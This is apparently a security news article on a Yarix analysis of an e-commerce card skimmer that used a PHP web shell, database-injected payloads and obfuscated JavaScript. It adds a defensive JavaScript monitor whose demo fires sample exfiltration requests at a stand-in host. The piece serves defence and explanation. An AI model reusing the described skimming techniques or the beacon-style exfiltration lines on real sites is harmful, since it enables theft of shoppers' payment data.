
The Yarix Incident Response Team has uncovered a sophisticated web skimming operation that weaponized obfuscated JavaScript to silently siphon credit card data from unsuspecting shoppers on a compromised e-commerce platform. The findings shed light on how Magecart-style attacks continue to evolve, utilizing stealth, persistence, and clever evasion to bypass modern detection systems.
The investigation began with the analysis of a seemingly innocuous script found embedded in an e-commerce checkout page. According to Yarix: “The script turned out to be designed to steal credit card data to exfiltrate sensitive information during online transactions on an e-commerce site.”
Further inspection revealed that the code was not just malicious—it was meticulously obfuscated to conceal its true intent. This obfuscation included misleading function names, hexadecimal values, and dynamic self-defining functions like the aptly nicknamed “chameleon”.
“At the beginning of the analysis, the code contained within the script appears well obfuscated and almost unreadable… The ‘chameleon’ function is particularly interesting because it self-defines again after the first use.”
The attack began with a classic tactic: credential theft via infostealer malware, enabling unauthorized access to the e-commerce backend. Once inside, the attacker uploaded a malicious PHP web shell, granting full remote control over the server.
“This PHP file acts as a web shell and allows the attacker to execute commands and gain complete remote control… ensuring that the attacker can return to control the server.”
The next move was to tamper with the site’s database, inserting a fake image script—a covert payload that would later serve as a trigger for further malicious activity.
The core of the attack was a heavily disguised JavaScript module masquerading as an image handler. It dynamically injected additional scripts, monitored checkout forms, and stole user input during checkout. It used two cunning exfiltration methods:
1. WebSocket-Based Data Theft
A function named createWebSocket established an encrypted channel to the attacker’s Command-and-Control (C&C) server.
“The function extracts data from the local memory of the browser, using the key ‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’… and creates a WebSocket instance.”
Once active, the WebSocket transmitted stolen data such as card numbers and initiated real-time interactions to adapt the fake checkout form based on user activity.
2. Fake Image Exfiltration
The attackers also used a createImage function to discreetly transmit base64-encoded data to a remote server via an invisible image request.
“This stratagem makes it possible to circumvent normal HTTP request tracking by exploiting the nature of images to pass information through without the user being aware of it.”
This allowed email addresses, names, addresses, card details, and even user agents to be exfiltrated without triggering any alarms.
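As an added example (not code from the Yarix report or from the skimmer), a defensive runtime monitor for the two exfiltration channels just described: it wraps a window's WebSocket constructor and the Image.src setter and reports any destination host that is not on an allow-list. The names installExfilMonitor, makeFakeWindow and demo, the hosts shop.example and collector.example.net, and the stand-in window object are assumptions constructed so the example runs offline.

```javascript
// Monitor both exfiltration channels: report every WebSocket or image
// destination whose host is not on the allow-list for this page.
function installExfilMonitor(win, pageOrigin, allowedHosts, report) {
  const hostOf = (url) => {
    try { return new URL(String(url), pageOrigin).host; } catch { return "(invalid)"; }
  };
  const check = (channel, url) => {
    const host = hostOf(url);
    if (!allowedHosts.includes(host)) report({ channel, host, url: String(url).slice(0, 80) });
  };
  // Channel 1: WebSocket to a remote server. Intercept the constructor call.
  const OrigWS = win.WebSocket;
  win.WebSocket = function (url, protocols) {
    check("websocket", url);
    return new OrigWS(url, protocols);
  };
  // Channel 2: data smuggled in the query string of an image request.
  // Intercept assignments to img.src on every Image created by page scripts.
  const OrigImage = win.Image;
  const srcDesc = Object.getOwnPropertyDescriptor(OrigImage.prototype, "src");
  win.Image = function (...args) {
    const img = new OrigImage(...args);
    Object.defineProperty(img, "src", {
      set(v) { check("image", v); srcDesc.set.call(this, v); },
      get() { return srcDesc.get.call(this); },
    });
    return img;
  };
}

// Constructed stand-in for a browser window so the example runs in Node.
function makeFakeWindow() {
  class FakeWebSocket { constructor(url) { this.url = url; } }
  class FakeImage {
    constructor() { this._src = ""; }
    get src() { return this._src; }
    set src(v) { this._src = v; }
  }
  return { WebSocket: FakeWebSocket, Image: FakeImage };
}

// Replays the two behaviours from the report against the monitor; returns the alerts.
function demo() {
  const win = makeFakeWindow();
  const alerts = [];
  installExfilMonitor(win, "https://shop.example/", ["shop.example", "cdn.shop.example"], (a) => alerts.push(a));
  new win.WebSocket("wss://cdn.shop.example/live");      // first-party host: no alert
  new win.WebSocket("wss://collector.example.net/ws");   // unknown host: alert
  const logo = new win.Image();
  logo.src = "/img/logo.png";                            // relative, first-party: no alert
  const beacon = new win.Image();
  beacon.src = "https://collector.example.net/i.gif?d=c2FtcGxl"; // base64 in query: alert
  return alerts;
}
```

In a real page the monitor is installed with the real `window` before any third-party script runs; the alerts are then forwarded to a reporting endpoint, much like a CSP violation report.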
To ensure long-term presence, the attackers injected malicious payloads directly into the database:
“This technique (database pollution)… allowed malicious code to be executed whenever the website performed a read of the tampered row of its database.”
This clever move guaranteed that even if the external scripts were removed, the next page load could reinfect the site.

Organizations must regularly audit not only front-end content but also their backend infrastructure, database integrity, and browser localStorage access patterns. As Yarix concludes:
“The goal of this analysis is to understand the techniques used by the attacker thus enabling the development of effective mitigation strategies.”